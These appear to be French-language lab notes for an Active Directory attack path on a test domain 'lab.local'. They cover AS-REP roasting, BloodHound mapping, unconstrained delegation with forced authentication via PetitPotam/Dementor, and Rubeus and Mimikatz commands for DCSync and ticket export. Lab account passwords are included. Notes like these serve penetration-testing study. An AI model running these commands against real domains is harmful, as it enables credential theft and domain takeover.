lookupsid pour récupérer liste des users - lookupsid.py de la suite impacket asreproasting hclark - GetNPUSerss de la suite impacket pypykatz compte AYOUNG - Pypykatz AYOUNG peut modifier le password de CMOORE - Bloodhound.py en tant que Collecteur - Neo4j en tant que base de données - Bloodhound en tant qu'outil de cartographie - Powersploit pour modifier le mot de passe CMOORE admin sur sharepoint - Crackmapexec pour scanner les accès délégation sans contrainte sur sharepoint - Vu à partir de Bloodhound dcsync du dc - Via Rubeus.exe et Mimikatz.exe - Forcer une authentification kerberos via PetitPotam ou Dementor.py HCLARCK / spiderman AYOUNG / iloverobbin CMOORE / .\Rubeus.exe monitor /interval:1 /nowrap sur kali on fait un dementor pour forcer une authentification du kdc (If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system. Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication. from : https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse voir aussi : https://www.thehacker.recipes/ad/movement/print-spooler-service/printerbug) .\Rubeus.exe ptt /ticket: klist lsadump::dcsync /user:lab\administrateur /domain:lab.local -> obtenir le hash NT de l'admin du domaine sekurlsa::tickets /export https://beta.hackndo.com https://github.com/SecureAuthCorp/impacket https://github.com/PowerShellMafia/PowerSploit https://github.com/BloodHoundAD/BloodHound https://github.com/fox-it/BloodHound.py https://book.hacktricks.xyz https://www.thehacker.recipes https://tryhackme.com/paths https://github.com/r3motecontrol/Ghostpack-CompiledBinaries https://github.com/NotMedic/NetNTLMtoSilverTicket